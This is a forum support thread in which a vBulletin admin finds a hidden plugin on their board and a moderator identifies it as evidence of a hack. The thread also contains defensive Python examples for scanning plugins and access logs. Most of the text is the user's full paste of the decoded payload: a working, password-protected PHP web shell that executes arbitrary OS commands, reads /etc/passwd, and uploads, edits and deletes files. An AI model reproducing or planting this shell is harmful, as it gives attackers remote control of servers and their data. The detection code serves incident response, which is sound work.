Serious problem with vBulletin 3.8


mdrs2
09-13-2011, 10:13 AM
Hi guys,
My forum only shows the first page of all threads. It happened suddenly. I've not installed any plugins recently.
When I disable all hooks, it is OK!

Lynne
09-13-2011, 03:46 PM
If you disable hooks and it is OK, then it is one of your modifications causing the issue. So, disable all Products except the vBulletin Blog and vBulletin CMS (Admin CP -> Plugins & Products -> Manage Products -> Disable) AND uncheck all the plugins except those related to the vBulletin Blog and vBulletin CMS (Admin CP -> Plugins & Products -> Plugin Manager). You must do BOTH of those steps in order to disable all non-vBulletin modifications. Now turn the modifications back on, one by one, and see if the problem starts again.

mdrs2
09-13-2011, 05:51 PM
I still have the problem.
I've disabled all products and unchecked all plugins, but it didn't fix it! As soon as I disable those from (vBulletin Options => Plugin/Hook System) the problem is solved, but if I disable those manually I still have the problem!

Lynne
09-14-2011, 01:39 AM
If it works when you do it via the Options, then you did not completely disable them all via BOTH the Plugin Manager AND the Manage Products page.

mdrs2
09-14-2011, 07:43 AM
Thanks Lynne ;)
Finally I found the corrupted plugin!
Can anyone tell me what this plugin is and what it is for?
There are two similar plugins. I have to disable the first one. If I enable the first one and disable the second one, I still have the problem! Can I delete it?
My vB is 3.8.4
https://vborg.vbsupport.ru/external/2011/09/45.jpg

Lynne
09-14-2011, 04:55 PM
I have no idea what they are, but they are not default vBulletin plugins. Are they exactly the same? What do they do? If you didn't install them, then you should remove them.

mdrs2
09-14-2011, 10:43 PM
Honestly, I don't know what they do! Anyway, I disabled both of them and nothing happened at all.
They both have the same content, which I quote here:

if (strpos($_SERVER['PHP_SELF'],"subscriptions.php")) {

eval(base64_decode('[base64-encoded payload omitted]'));

exit;
}

Lynne
09-14-2011, 11:01 PM
I hate to tell you, but you've most likely been hacked. base64 is never a good thing to see in any of your code. I would remove those and look at your access_logs to see how they did this. You may need to ask your host for help.
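
A way to check every plugin for the pattern quoted above, as an added example that is not part of the original thread: it finds eval(base64_decode('...')) wrappers, decodes the payload as text without executing it, and reports which command-execution function names appear inside. The plugin titles, the sample payload and the input shape (title and PHP code pairs, however you export them from your board) are constructed assumptions.

```python
import base64
import binascii
import re

# eval(base64_decode('...')) with either quote style. The payload group accepts
# whitespace because forums and editors wrap long strings with injected spaces.
EVAL_B64 = re.compile(
    r"""eval\s*\(\s*base64_decode\s*\(\s*(['"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)""",
    re.IGNORECASE,
)

# PHP functions that run OS commands or accept uploads; a forum plugin has
# little reason to hide any of these behind an encoding layer.
RISKY = re.compile(r"\b(passthru|shell_exec|system|exec|move_uploaded_file)\b", re.IGNORECASE)


def decode_payload(blob):
    """Return the decoded payload as text, or None if it is not valid base64."""
    compact = re.sub(r"\s+", "", blob)       # undo forum/editor line wrapping
    compact += "=" * (-len(compact) % 4)     # tolerate stripped padding
    try:
        raw = base64.b64decode(compact, validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-8", errors="replace")


def scan_plugin(title, phpcode):
    """Return one finding per eval(base64_decode(...)) wrapper in a plugin."""
    findings = []
    for match in EVAL_B64.finditer(phpcode):
        decoded = decode_payload(match.group(2))
        findings.append({
            "plugin": title,
            "decoded_ok": decoded is not None,
            "indicators": sorted({m.lower() for m in RISKY.findall(decoded or "")}),
            "preview": (decoded or "")[:80],
        })
    return findings


def scan_all(plugins):
    return [f for title, code in plugins for f in scan_plugin(title, code)]


def wrap_like_forum(text, width=50):
    """Insert a space every `width` characters, as forum software does."""
    return " ".join(text[i:i + width] for i in range(0, len(text), width))


# Constructed sample data: a harmless string that only mentions a risky name.
SAMPLE_DECODED = ("session_start();\r\nerror_reporting(0);\r\n"
                  "if (function_exists(passthru)) { /* constructed sample */ }")
SAMPLE_B64 = wrap_like_forum(base64.b64encode(SAMPLE_DECODED.encode()).decode())
SAMPLE_PLUGINS = [
    ("Constructed benign plugin", "$show['example'] = true;"),
    ("Constructed suspicious plugin",
     "if (strpos($_SERVER['PHP_SELF'],\"subscriptions.php\")) {\n"
     "eval(base64_decode('" + SAMPLE_B64 + "'));\nexit;\n}"),
]

if __name__ == "__main__":
    for finding in scan_all(SAMPLE_PLUGINS):
        print(finding)
```

A wrapper that fails to decode is still reported with decoded_ok set to False, since an encoded blob inside a plugin deserves a manual look either way.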

mdrs2
09-15-2011, 09:32 PM
Here is the full code ;)
http://www.mediafire.com/?cscsok6c1mfz6b4

I'm waiting for your response.

Lynne
09-15-2011, 10:26 PM
I'm not sure what response you want from me. You've been hacked. You need to talk to your host about how this happened and how to fix the issue.

You may google for a base64 converter to find out what that code does. Just to let you know, this is part of the comments:
The shell can be used by anyone to command any server, .....

mdrs2
09-15-2011, 11:04 PM
That's the decoded code:

session_start();

error_reporting(0);



$version = "0.7B";

$functions = array('Clear Screen' => 'ClearScreen()',
'Clear History' => 'ClearHistory()',
'Can I function?' => "runcommand('canirun','GET')",
'Get server info' => "runcommand('showinfo','GET')",
'Read /etc/passwd' => "runcommand('etcpasswdfile','GET')",
'Open ports' => "runcommand('netstat -an | grep -i listen','GET')",
'Running processes' => "runcommand('ps -aux','GET')",
'Readme' => "runcommand('shellhelp','GET')"

);
$thisfile = basename(__FILE__);

$style = '<style type="text/css">
.cmdthing {
border-top-width: 0px;
font-weight: bold;
border-left-width: 0px;
font-size: 10px;
border-left-color: #000000;
background: #000000;
border-bottom-width: 0px;
border-bottom-color: #FFFFFF;
color: #FFFFFF;
border-top-color: #008000;
font-family: verdana;
border-right-width: 0px;
border-right-color: #000000;
}
input,textarea {
border-top-width: 1px;
font-weight: bold;
border-left-width: 1px;
font-size: 10px;
border-left-color: #FFFFFF;
background: #000000;
border-bottom-width: 1px;
border-bottom-color: #FFFFFF;
color: #FFFFFF;
border-top-color: #FFFFFF;
font-family: verdana;
border-right-width: 1px;
border-right-color: #FFFFFF;
}
A:hover {
text-decoration: none;
}


table,td,div {
border-collapse: collapse;
border: 1px solid #FFFFFF;
}
body {
color: #FFFFFF;
font-family: verdana;
}
</style>';
$sess = __FILE__.$password;
if(isset($_POST['p4ssw0rD']))
{
if($_POST['p4ssw0rD'] == $password)
{
$_SESSION[$sess] = $_POST['p4ssw0rD'];
}
else
{
die("Wrong password");
}

}
if($_SESSION[$sess] == $password)
{
if(isset($_SESSION['workdir']))
{
if(file_exists($_SESSION['workdir']) && is_dir($_SESSION['workdir']))
{
chdir($_SESSION['workdir']);
}
}

if(isset($_FILES['uploadedfile']['name']))
{
$target_path = "./";
$target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {

}
}

if(isset($_GET['runcmd']))
{

$cmd = $_GET['runcmd'];

print "<b>".get_current_user()."~# </b>". htmlspecialchars($cmd)."<br>";

if($cmd == "")
{
print "Empty Command..type \"shellhelp\" for some ehh...help";
}

elseif($cmd == "upload")
{
print '<br>Uploading to: '.realpath(".");
if(is_writable(realpath(".")))
{
print "<br><b>I can write to this directory</b>";
}
else
{
print "<br><b><font color=red>I can't write to this directory, please choose another one.</b></font>";
}

}
elseif((ereg("changeworkdir (.*)",$cmd,$file)) || (ereg("cd (.*)",$cmd,$file)))
{
if(file_exists($file[1]) && is_dir($file[1]))
{
chdir($file[1]);
$_SESSION['workdir'] = $file[1];
print "Current directory changed to ".$file[1];
}
else
{
print "Directory not found";
}
}

elseif(strtolower($cmd) == "shellhelp")
{
print '<b><font size=7>Ajax/PHP Command Shell</b></font>
&copy; By Ironfist

The shell can be used by anyone to command any server, the main purpose was
to create a shell that feels as dynamic as possible, is expandable and easy
to understand.

If one of the command execution functions work, the shell will function fine.
Try the "canirun" command to check this.

Any (not custom) command is a UNIX command, like ls, cat, rm ... If you\'re
not used to these commands, google a little.

<b>Custom Functions</b>
If you want to add your own custom command in the Quick Commands list, check
out the code. The $function array contains \'func name\' => \'javascript function\'.
Take a look at the built-in functions for examples.

I know this readme isn\'t providing too much information, but hell, does this shell
even require one :P

- Iron
';

}
elseif(ereg("editfile (.*)",$cmd,$file))
{
if(file_exists($file[1]) && !is_dir($file[1]))
{
print "<form name=\"saveform\"><textarea cols=70 rows=10 id=\"area1\">";
$contents = file($file[1]);
foreach($contents as $line)
{
print htmlspecialchars($line);
}
print "</textarea><br><input size=80 type=text name=filetosave value=".$file[1]."><input value=\"Save\" type=button onclick=\"SaveFile();\"></form>";
}
else
{
print "File not found.";
}
}
elseif(ereg("deletefile (.*)",$cmd,$file))
{
if(is_dir($file[1]))
{
if(rmdir($file[1]))
{
print "Directory succesfully deleted.";
}
else
{
print "Couldn't delete directory!";
}
}
else
{
if(unlink($file[1]))
{
print "File succesfully deleted.";
}
else
{
print "Couldn't delete file!";
}
}
}
elseif(strtolower($cmd) == "canirun")
{
print "If any of these functions is Enabled, the shell will function like it should.<br>";
if(function_exists(passthru))
{
print "Passthru: <b><font color=green>Enabled</b></font><br>";
}
else
{
print "Passthru: <b><font color=red>Disabled</b></font><br>";
}

if(function_exists(exec))
{
print "Exec: <b><font color=green>Enabled</b></font><br>";
}
else
{
print "Exec: <b><font color=red>Disabled</b></font><br>";
}

if(function_exists(system))
{
print "System: <b><font color=green>Enabled</b></font><br>";
}
else
{
print "System: <b><font color=red>Disabled</b></font><br>";
}
if(function_exists(shell_exec))
{
print "Shell_exec: <b><font color=green>Enabled</b></font><br>";
}
else
{
print "Shell_exec: <b><font color=red>Disabled</b></font><br>";
}
print "<br>Safe mode will prevent some stuff, maybe command execution, if you're looking for a <br>reason why the commands aren't executed, this is probally it.<br>";
if( ini_get('safe_mode') ){
print "Safe Mode: <b><font color=red>Enabled</b></font>";
}
else
{
print "Safe Mode: <b><font color=green>Disabled</b></font>";
}
print "<br><br>Open_basedir will block access to some files you <i>shouldn't</i> access.<br>";
if( ini_get('open_basedir') ){
print "Open_basedir: <b><font color=red>Enabled</b></font>";
}
else
{
print "Open_basedir: <b><font color=green>Disabled</b></font>";
}
}
//About the shell
elseif(ereg("listdir (.*)",$cmd,$directory))
{

if(!file_exists($directory[1]))
{
die("Directory not found");
}
//Some variables
chdir($directory[1]);
$i = 0; $f = 0;
$dirs = "";
$filez = "";

if(!ereg("/$",$directory[1])) //Does it end with a slash?
{
$directory[1] .= "/"; //If not, add one
}
print "Listing directory: ".$directory[1]."<br>";
print "<table border=0><td><b>Directories</b></td><td><b>Files</b></td><tr>";

if ($handle = opendir($directory[1])) {
while (false !== ($file = readdir($handle))) {
if(is_dir($file))
{
$dirs[$i] = $file;
$i++;
}
else
{
$filez[$f] = $file;
$f++;
}

}
print "<td>";

foreach($dirs as $directory)
{
print "<i style=\"cursor:crosshair\" onclick=\"deletefile('".realpath($directory)."');\">[D]</i><i style=\"cursor:crosshair\" onclick=\"runcommand('changeworkdir ".realpath($directory)."','GET');\">[W]</i><b style=\"cursor:crosshair\" onclick=\"runcommand('clear','GET'); runcommand ('listdir ".realpath($directory)."','GET'); \">".$directory."</b><br>";
}

print "</td><td>";

foreach($filez as $file)
{
print "<i style=\"cursor:crosshair\" onclick=\"deletefile('".realpath($file)."');\">[D]</i><u style=\"cursor:crosshair\" onclick=\"runcommand('editfile ".realpath($file)."','GET');\">".$file."</u><br>";
}

print "</td></table>";
}
}
elseif(strtolower($cmd) == "about")
{
print "Ajax Command Shell by <a href=http://www.ironwarez.info>Ironfist</a>.<br>Version $version";
}
//Show info
elseif(strtolower($cmd) == "showinfo")
{
if(function_exists(disk_free_space))
{
$free = disk_free_space("/") / 1000000;
}
else
{
$free = "N/A";
}
if(function_exists(disk_total_space))
{
$total = trim(disk_total_space("/") / 1000000);
}
else
{
$total = "N/A";
}
$path = realpath (".");

print "<b>Free:</b> $free / $total MB<br><b>Current path:</b> $path<br><b>Uname -a Output:</b><br>";

if(function_exists(passthru))
{
passthru("uname -a");
}
else
{
print "Passthru is disabled :(";
}
}
//Read /etc/passwd
elseif(strtolower($cmd) == "etcpasswdfile")
{

$pw = file('/etc/passwd/');
foreach($pw as $line)
{
print $line;
}


}
//Execute any other command
else
{

if(function_exists(passthru))
{
passthru($cmd);
}
else
{
if(function_exists(exec))
{
exec("ls -la",$result);
foreach($result as $output)
{
print $output."<br>";
}
}
else
{
if(function_exists(system))
{
system($cmd);
}
else
{
if(function_exists(shell_exec))
{
print shell_exec($cmd);
}
else
{
print "Sorry, none of the command functions works.";
}
}
}
}
}
}

elseif(isset($_GET['savefile']) && !empty($_POST['filetosave']) && !empty($_POST['filecontent']))
{
$file = $_POST['filetosave'];
if(!is_writable($file))
{
if(!chmod($file, 0777))
{
die("Nope, can't chmod nor save :("); //In fact, nobody ever reads this message ^_^
}
}

$fh = fopen($file, 'w');
$dt = $_POST['filecontent'];
fwrite($fh, $dt);
fclose($fh);
}
else
{
?>
<html>
<title>mihandownload<?php print getenv("HTTP_HOST"); ?></title>
<head>
<?php print $style; ?>
<SCRIPT TYPE="text/javascript">
function sf(){document.cmdform.command.focus();}
var outputcmd = "";
var cmdhistory = "";
function ClearScreen()
{
outputcmd = "";
document.getElementById('output').innerHTML = outputcmd;
}

function ClearHistory()
{
cmdhistory = "";
document.getElementById('history').innerHTML = cmdhistory;
}

function deletefile(file)
{
deleteit = window.confirm("Are you sure you want to delete\n"+file+"?");
if(deleteit)
{
runcommand('deletefile ' + file,'GET');
}
}

var http_request = false;
function makePOSTRequest(url, parameters) {
http_request = false;
if (window.XMLHttpRequest) {
http_request = new XMLHttpRequest();
if (http_request.overrideMimeType) {
http_request.overrideMimeType('text/html');
}
} else if (window.ActiveXObject) {
try {
http_request = new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
try {
http_request = new ActiveXObject("Microsoft.XMLHTTP");
} catch (e) {}
}
}
if (!http_request) {
alert('Cannot create XMLHTTP instance');
return false;
}


http_request.open('POST', url, true);
http_request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http_request.setRequestHeader("Content-length", parameters.length);
http_request.setRequestHeader("Connection", "close");
http_request.send(parameters);
}


function SaveFile()
{
var poststr = "filetosave=" + encodeURI( document.saveform.filetosave.value ) +
"&filecontent=" + encodeURI( document.getElementById("area1").value );
makePOSTRequest('<?php print $ThisFile; ?>?savefile', poststr);
document.getElementById('output').innerHTML = document.getElementById('output').innerHTML + "<br><b>Saved! If it didn't save, you'll need to chmod the file to 777 yourself,<br> however the script tried to chmod it automaticly.";
}

function runcommand(urltoopen,action,contenttosend){
cmdhistory = "<br>&nbsp;<i style=\"cursor:crosshair\" onclick=\"document.cmdform.command.value='" + urltoopen + "'\">" + urltoopen + "</i> " + cmdhistory;
document.getElementById('history').innerHTML = cmdhistory;
if(urltoopen == "clear")
{
ClearScreen();
}
var ajaxRequest;
try{
ajaxRequest = new XMLHttpRequest();
} catch (e){
try{
ajaxRequest = new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
try{
ajaxRequest = new ActiveXObject("Microsoft.XMLHTTP");
} catch (e){
alert("Wicked error, nothing we can do about it...");
return false;
}
}
}
ajaxRequest.onreadystatechange = function(){
if(ajaxRequest.readyState == 4){
outputcmd = "<pre>" + outputcmd + ajaxRequest.responseText +"</pre>";
document.getElementById('output').innerHTML = outputcmd;
var objDiv = document.getElementById("output");
objDiv.scrollTop = objDiv.scrollHeight;
}
}
ajaxRequest.open(action, "?runcmd="+urltoopen , true);
if(action == "GET")
{
ajaxRequest.send(null);
}
document.cmdform.command.value='';
return false;
}

function set_tab_html(newhtml)
{
document.getElementById('commandtab').innerHTML = newhtml;
}

function set_tab(newtab)
{
if(newtab == "cmd")
{
newhtml = '&nbsp;&nbsp;&nbsp;<form name="cmdform" onsubmit="return runcommand(document.cmdform.command.value,\'GET\') ;"><b>Command</b>: <input type=text name=command class=cmdthing size=100%><br></form>';
}
else if(newtab == "upload")
{
runcommand('upload','GET');
newhtml = '<font size=0><b>This will reload the page... :(</b><br><br><form enctype="multipart/form-data" action="<?php print $ThisFile; ?>" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="10000000" />Choose a file to upload: <input name="uploadedfile" type="file" /><br /><input type="submit" value="Upload File" /></form></font>';
}
else if(newtab == "workingdir")
{
<?php
$folders = "<form name=workdir onsubmit=\"return runcommand(\'changeworkdir \' + document.workdir.changeworkdir.value,\'GET\');\"><input size=80% type=text name=changeworkdir value=\"";
$pathparts = explode("/",realpath ("."));
foreach($pathparts as $folder)
{
$folders .= $folder."/";
}
$folders .= "\"><input type=submit value=Change></form><br>Script directory: <i style=\"cursor:crosshair\" onclick=\"document.workdir.changeworkdir.value=\'".dirname(__FILE__)."\'>".dirname(__FILE__)."</i>";

?>
newhtml = '<?php print $folders; ?>';
}
else if(newtab == "filebrowser")
{
newhtml = '<b>File browser is under construction! Use at your own risk!</b> <br>You can use it to change your working directory easily, don\'t expect too much of it.<br>Click on a file to edit it.<br><i>[W]</i> = set directory as working directory.<br><i>[D]</i> = delete file/directory';
runcommand('listdir .','GET');
}
else if(newtab == "createfile")
{
newhtml = '<b>File Editor, under construction.</b>';
document.getElementById('output').innerHTML = "<form name=\"saveform\"><textarea cols=70 rows=10 id=\"area1\"></textarea><br><input size=80 type=text name=filetosave value=\"<?php print realpath('.')."/".rand(1000,999999).".txt"; ?>\"><input value=\"Save\" type=button onclick=\"SaveFile();\"></form>";

}
document.getElementById('commandtab').innerHTML = newhtml;
}
</script>
</head>
<body bgcolor=black onload="sf();" vlink=white alink=white link=white>
<table border=1 width=100% height=100%>
<td width=15% valign=top>

<form name="extras"><br>
<center><b>Quick Commands</b><br>

<div style='margin: 0px;padding: 0px;border: 1px inset;overflow: auto'>
<?php
foreach($functions as $name => $execute)
{
print '&nbsp;<input type="button" value="'.$name.'" onclick="'.$execute.'"><br>';
}
?>

</center>

</div>
</form>
<center><b>Command history</b><br></center>
<div id="history" style='margin: 0px;padding: 0px;border: 1px inset;width: 100%;height: 20%;text-align: left;overflow: auto;font-size: 10px;'></div>
<br>
<center><b>About</b><br></center>
<div style='margin: 0px;padding: 0px;border: 1px inset;width: 100%;text-align: center;overflow: auto; font-size: 10px;'>
<br>
<b><font size=3>Ajax/PHP Command Shell</b></font><br>by Ironfist
<br>
Version <?php print $version; ?>

<br>
<br>

<br>Thanks to everyone @
<a href="http://www.ironwarez.info" target=_blank>SharePlaza</a>
<br>
<a href="http://www.milw0rm.com" target=_blank>milw0rm</a>
<br>
and special greetings to everyone in rootshell
</div>

</td>
<td width=70%>
<table border=0 width=100% height=100%><td id="tabs" height=1%><font size=0>
<b style="cursor:crosshair" onclick="set_tab('cmd');">[Execute command]</b>
<b style="cursor:crosshair" onclick="set_tab('upload');">[Upload file]</b>
<b style="cursor:crosshair" onclick="set_tab('workingdir');">[Change directory]</b>
<b style="cursor:crosshair" onclick="set_tab('filebrowser');">[Filebrowser]</b>
<b style="cursor:crosshair" onclick="set_tab('createfile');">[Create File]</b>

</font></td>
<tr>
<td height=99% width=100% valign=top><div id="output" style='height:100%;white-space:pre;overflow:auto'></div>

<tr>
<td height=1% width=100% valign=top>
<div id="commandtab" style='height:100%;white-space:pre;overflow:auto'>
&nbsp;&nbsp;&nbsp;<form name="cmdform" onsubmit="return runcommand(document.cmdform.command.value,'GET');">
<b>Command</b>: <input type=text name=command class=cmdthing size=100%><br>
</form>
</div>
</td>
</table>
</td>
</table>
</body>
</html>
<?php
}
} else {
print "<center><table border=0 height=100%>
<td valign=middle>
<form action=".basename(__FILE__)." method=POST>You are not logged in, please login.<br><b>Password:</b><input type=password name=p4ssw0rD><input type=submit value=\"Log in\">
</form>";
}

.
.
.
I think they wanted to hunt passwords, didn't they? If yes, can I find out where they wanted to save the log file!?

Lynne
09-16-2011, 03:15 AM
I know what it decodes to, but didn't feel it was important to post the code. The bottom line is you've been hacked. You need to talk to your host to figure out how this happened and then fix it.
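
For the access-log review recommended in this thread, an added example that is not part of the original posts: the plugin quoted earlier only fires on requests whose path contains subscriptions.php, and the decoded code is driven by the runcmd and savefile query parameters, so requests combining the two are the ones to pull out. The log format (Apache combined), the paths and the addresses in the sample are constructed assumptions.

```python
import re
from datetime import datetime
from urllib.parse import urlsplit, parse_qs

# Apache/nginx "combined" access log line (assumed format).
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
TRIGGER = "subscriptions.php"          # path the injected plugin checks for
SHELL_KEYS = {"runcmd", "savefile"}    # query keys the decoded code reads


def find_shell_requests(lines):
    """Return requests to the trigger page that carry one of the shell's query keys."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if TRIGGER not in url.path:
            continue
        # keep_blank_values: "?savefile" has a key but no value
        params = parse_qs(url.query, keep_blank_values=True)
        for key in sorted(SHELL_KEYS & params.keys()):
            hits.append({
                "ip": m["ip"],
                "time": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
                "method": m["method"],
                "status": int(m["status"]),
                "key": key,
                "value": params[key][0],   # already URL-decoded by parse_qs
            })
    return hits


def summarize(hits):
    """Per client address: earliest matching request and request count."""
    summary = {}
    for hit in hits:
        entry = summary.setdefault(hit["ip"], {"first_seen": hit["time"], "requests": 0})
        entry["first_seen"] = min(entry["first_seen"], hit["time"])
        entry["requests"] += 1
    return {ip: {"first_seen": e["first_seen"].isoformat(), "requests": e["requests"]}
            for ip, e in summary.items()}


# Constructed sample log lines (documentation address ranges).
SAMPLE_LOG = """
198.51.100.7 - - [10/Sep/2011:03:12:44 +0000] "GET /forum/subscriptions.php?runcmd=canirun HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Sep/2011:03:13:02 +0000] "GET /forum/subscriptions.php?runcmd=listdir%20. HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.10 - - [10/Sep/2011:03:14:00 +0000] "GET /forum/subscriptions.php?do=viewsubscription HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Sep/2011:03:15:30 +0000] "POST /forum/subscriptions.php?savefile HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.0.2.10 - - [10/Sep/2011:03:16:00 +0000] "GET /forum/showthread.php?t=1 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    found = find_shell_requests(SAMPLE_LOG.splitlines())
    for hit in found:
        print(hit["time"].isoformat(), hit["ip"], hit["method"], hit["key"], repr(hit["value"]))
    print(summarize(found))
```

The earliest first_seen value bounds the search for the initial compromise: the plugin had to be in place before that request, so the entries to hand to the host are the ones from that address and time window leading up to it.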